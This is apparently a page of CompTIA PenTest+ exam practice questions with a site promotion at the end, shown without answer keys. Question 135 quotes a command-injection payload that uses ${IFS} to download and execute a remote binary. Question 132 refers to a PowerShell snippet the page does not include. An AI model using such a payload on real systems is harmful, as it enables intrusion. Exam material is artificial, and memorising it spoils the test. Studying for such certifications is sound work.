Exam Details

  • Exam Code
    :PT0-002
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :455 Q&As
  • Last Updated
    :Apr 05, 2025

CompTIA CompTIA Certifications PT0-002 Questions & Answers

  • Question 131:

    A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

    A. Cross-site request forgery

    B. Server-side request forgery

    C. Remote file inclusion

    D. Local file inclusion

  • Question 132:

    The following PowerShell snippet was extracted from a log of an attacker machine:

    A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

    A. Line 8

    B. Line 13

    C. Line 19

    D. Line 20

  • Question 133:

    A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

    A. Spawned shells

    B. Created user accounts

    C. Server logs

    D. Administrator accounts

    E. Reboot system

    F. ARP cache

  • Question 134:

    A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

    A. Prohibiting exploitation in the production environment

    B. Requiring all testers to review the scoping document carefully

    C. Never assessing the production networks

    D. Prohibiting testers from joining the team during the assessment

  • Question 135:

    A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST "

    exploit += "/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} ?

    c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache'%0A%27andloginUser=aandPwd=a"

    exploit += "HTTP/1.1"

    Which of the following commands should the penetration tester run post-engagement?

    A. grep -v apache ~/.bash_history > ~/.bash_history

    B. rm -rf /tmp/apache

    C. chmod 600 /tmp/apache

    D. taskkill /IM "apache" /F

  • Question 136:

    A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

    A. Nmap

    B. Nikto

    C. Cain and Abel

    D. Ethercap

  • Question 137:

    Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

    A. The IP address is wrong.

    B. The server is unreachable.

    C. The IP address is on the blocklist.

    D. The IP address is on the allow list.

  • Question 138:

    A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

    A. Badge cloning

    B. Dumpster diving

    C. Tailgating

    D. Shoulder surfing

  • Question 139:

    A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

    A. nmap –f –sV –p80 192.168.1.20

    B. nmap –sS –sL –p80 192.168.1.20

    C. nmap –A –T4 –p80 192.168.1.20

    D. nmap –O –v –p80 192.168.1.20

  • Question 140:

    A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

    A. John the Ripper

    B. Hydra

    C. Mimikatz

    D. Cain and Abel

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.